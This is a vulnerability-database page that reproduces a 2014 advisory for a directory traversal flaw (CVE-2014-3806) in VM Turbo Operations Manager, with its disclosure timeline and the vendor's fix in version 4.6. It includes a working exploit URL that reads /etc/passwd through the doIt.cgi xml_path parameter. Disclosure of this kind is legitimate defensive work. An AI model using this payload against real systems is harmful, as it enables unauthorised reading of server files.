Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

VM Turbo Operations Manager 4.5x - Directory Traversal

Related Vulnerabilities: CVE-2014-3806  
Publish Date: 12 May 2014
Author: Jamal Pecou
Source / Download Exploit 
                							

                Product: VM Turbo Operations Manager
Vendor: VM Turbo
Vulnerable Version(s): 4.5.x earlier
Tested Version: 4.0
Advisory Publication: April 11, 2014 
Vendor Notification: April 11, 2014 
Public Disclosure: May 8, 2014 
Vulnerability Type: Directory Traversal

Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )

------------------------------------------------------------------------
-----------------------

Advisory Details:

A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file. 


The following exploitation example displays the contents of /etc/passwd

http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd

------------------------------------------------------------------------
-----------------------

Solution:

 The vendor has released a fix for this vulnerability in version 4.6.

References:

[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started